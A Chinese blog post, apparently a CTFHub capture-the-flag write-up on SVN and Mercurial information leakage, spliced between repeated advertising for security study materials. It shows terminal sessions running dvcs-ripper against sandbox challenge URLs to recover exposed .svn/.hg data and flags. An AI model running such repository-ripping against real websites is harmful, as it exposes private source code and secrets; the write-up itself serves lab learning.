2024年网络安全最全Web解题2 信息泄露 ( CTFHub ) - ctf(2)，网络安全高级面试题

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

-rw------- 1 kali kali 6633 Feb 28 22:40 rip-bzr.pl
-rw------- 1 kali kali 4915 Feb 28 22:40 rip-cvs.pl
-rw------- 1 kali kali 15672 Feb 28 22:40 rip-git.pl
-rw------- 1 kali kali 6327 Feb 28 22:40 rip-hg.pl
-rw------- 1 kali kali 6381 Feb 28 22:40 rip-svn.pl

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ ls
LICENSE README.md hg-decode.pl rip-bzr.pl rip-cvs.pl rip-git.pl rip-hg.pl rip-svn.pl

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ perl rip-svn.pl -u http://challenge-436df27ed95213e0.sandbox.ctfhub.com:10800/.svn/
[i] Found new SVN client storage format!
REP INFO => 1:file:///opt/svn/ctfhub:e43e7ef8-82fb-4194-9673-81c29de69c33
[i] Trying to revert the tree, if you get error, upgrade your SVN client!
Reverted ‘index.html’

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ tree .svn
.svn
├── entries
├── format
├── pristine
│ ├── bf
│ │ └── bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
│ └── f2
│ └── f21a3124b9a8bc5ad682b2d6c0bce356d85b577b.svn-base
├── text-base
├── tmp
├── wc.db
└── wc.db-journal

6 directories, 6 files

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ cat .svn/pristine/bf/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base

<html>

<head>
    <meta charset="UTF-8" />
    <title>CTFHub 信息泄露 SVN</title>
</head>

<body>
    <h1>信息泄露 - Subversion</h1>
    <br/>
    <p>Flag 在服务端旧版本的源代码中</p>
</body>

</html> 

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ cat .svn/pristine/f2/f21a3124b9a8bc5ad682b2d6c0bce356d85b577b.svn-base
ctfhub{ad260a295fdf50f420fd2c97}

发现flag。

• HG泄露

解题过程同上一题。

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ perl rip-hg.pl -u http://challenge-e6578c7d0a8df3df.sandbox.ctfhub.com:10800/.hg/
[i] Getting correct 404 responses
cannot find hg: No such file or directory at rip-hg.pl line 140.

perl [-u] :
使用utf-8编码来处理输入和输出。

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ ls -al
total 104
drwxr-xr-x 4 kali kali 4096 Feb 29 11:59 .
drwxr-xr-x 3 kali kali 4096 Feb 29 11:41 …
-rw------- 1 kali kali 164 Feb 28 22:40 .gitignore
drwxr-xr-x 3 kali kali 4096 Feb 29 12:01 .hg
drwxr-xr-x 5 kali kali 4096 Feb 29 11:44 .svn
-rw------- 1 kali kali 18367 Feb 28 22:40 LICENSE
-rw------- 1 kali kali 5770 Feb 28 22:40 README.md
-rw------- 1 kali kali 4018 Feb 28 22:40 hg-decode.pl
-rw-r–r-- 1 kali kali 221 Feb 29 11:44 index.html
-rw------- 1 kali kali 6633 Feb 28 22:40 rip-bzr.pl
-rw------- 1 kali kali 4915 Feb 28 22:40 rip-cvs.pl
-rw------- 1 kali kali 15672 Feb 28 22:40 rip-git.pl
-rw------- 1 kali kali 6327 Feb 28 22:40 rip-hg.pl
-rw------- 1 kali kali 6381 Feb 28 22:40 rip-svn.pl

上上条指令输出not found可能是下载不完全，还是生成了.hg文件的。打开，发现两个.txt文件，挨个curl过去，看是否返回flag。

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ tree .hg
.hg
├── 00changelog.i
├── dirstate
├── last-message.txt
├── requires
├── store
│ ├── 00changelog.i
│ ├── 00manifest.i
│ ├── data
│ ├── fncache
│ └── undo
├── undo.branch
├── undo.desc
└── undo.dirstate

3 directories, 11 files

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ cat .hg/last-message.txt
add flag

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ grep -a -r flag
.hg/last-message.txt:add flag
.hg/dirstate:index.htmln��!����flag_137388155.txt
.hg/store/undo:data/flag_137388155.txt.i0
.hg/store/fncache:data/flag_137388155.txt.i
.hg/undo.dirstate:index.htmla��������flag_137388155.txt
�O��L▒c.!flag_38i413377.index.htmlindex.htmlnormalfile

s

h

a

1

sha1

sha1bf45c36a4dfb73378247a6311eac4f80f48fcb92���normaldir()infinity��å~%
.svn/wc.db:�����2▒ flag_384413377.txt index.html
index.html3377.txt
hg-decode.pl: ( $head->{‘flags’},

-r：递归搜索。这个选项告诉grep命令在指定目录下递归搜索匹配的内容。如果省略该选项，grep只会搜索指定的文件或目录。
-a：处理二进制文件。这个选项告诉grep命令处理二进制文件，而不是简单地过滤掉它们。grep默认会将二进制文件视为非文本文件并跳过它们，但使用这个选项可以让grep尝试搜索这些文件。

┌──(kali㉿kali)-[~/hacktool/dvcs-ripper]
└─$ curl http://challenge-e6578c7d0a8df3df.sandbox.ctfhub.com:10800/flag_137388155.txt

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！